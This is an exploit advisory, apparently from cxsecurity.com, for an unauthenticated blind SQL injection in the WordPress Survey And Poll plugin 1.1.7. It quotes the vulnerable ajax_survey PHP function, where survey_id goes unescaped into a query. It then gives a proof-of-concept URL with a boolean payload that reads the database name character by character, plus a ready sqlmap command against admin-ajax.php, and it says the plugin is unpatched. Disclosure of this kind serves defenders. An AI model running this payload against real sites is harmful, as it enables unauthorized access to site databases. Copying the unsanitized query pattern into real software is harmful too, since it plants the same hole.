WordPress Survey And Poll 1.1.7 Blind SQL Injection

2015-02-13 / 2015-03-02
Credit: Securely
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

?################################################################# # Exploit Title : Wordpress Survey and poll Blind SQL Injection # Data : 2015 ? 02 - 11 # Exploit Author : Securely (Yoo Hee man) # Plugin : WordPress Survey and Poll # Vender Homepage : http://modalsurvey.sympies.com # Tested On : Windows XP / sqlmap_v1.0 # Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on) 1. Detail - This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php - Settings.php file is no login cookie check - "survey_id" variable is not sanitized ################################################################# public function ajax_survey() { global $wpdb; $survey_id = ""; $survey_name = ""; $survey_start_time = ""; $survey_expiry_time = ""; $survey_global = ""; if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']); else $survey_id = ""; if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']); else $survey_name = ""; if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time'])); else $survey_start_time = ""; if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time'])); else $survey_expiry_time = ""; if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']); else $survey_global = ""; if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']); else $survey_options = ""; if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']); else $survey_qa = ""; $survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id); if ($_REQUEST['sspcmd']=="save") { if ($survey_check>0) { //update survey $wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id)); $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id)); $wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id)); $qa_object = (array)json_decode(stripslashes($survey_qa)); $qa_array = (array)$qa_object; foreach($qa_array as $keyq=>$qr) { foreach($qr as $key=>$oa) { if ($key==0) { $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 'id' => ($keyq+1), 'survey_id' => $survey_id, 'question' => $oa ) ); $qid = $wpdb->insert_id; } else { $oans = explode("->",$oa); $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 'survey_id' => $survey_id, 'question_id' => ($keyq+1), 'answer' => $oans[0], 'count' => $oans[1], 'autoid' => $key ) ); } } } die("updated"); } else { //insert survey $wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 'id' => $survey_id, 'name' => $survey_name, 'options' => $survey_options, 'start_time' => $survey_start_time, 'expiry_time'=> $survey_expiry_time, 'global'=> $survey_global ) ); $qa_object = (array)json_decode(stripslashes($survey_qa)); $qa_array = (array)$qa_object; foreach($qa_array as $keyq=>$qr) { foreach($qr as $key=>$oa) { if ($key==0) { $wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 'id' => ($keyq+1), 'survey_id' => $survey_id, 'question' => $oa ) ); $qid = $wpdb->insert_id; } else { $oans = explode("->",$oa); $wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 'survey_id' => $survey_id, 'question_id' => ($keyq+1), 'answer' => $oans[0], 'autoid' => $key ) ); } } } die('success'); } ################################################################ 2. POC - http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi] - DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare] 3. Sqlmap - sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql 3. Solution: Not patched 4. Discovered By : Securely(Yoo Hee man) god2zuzu@naver.com

References:

https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top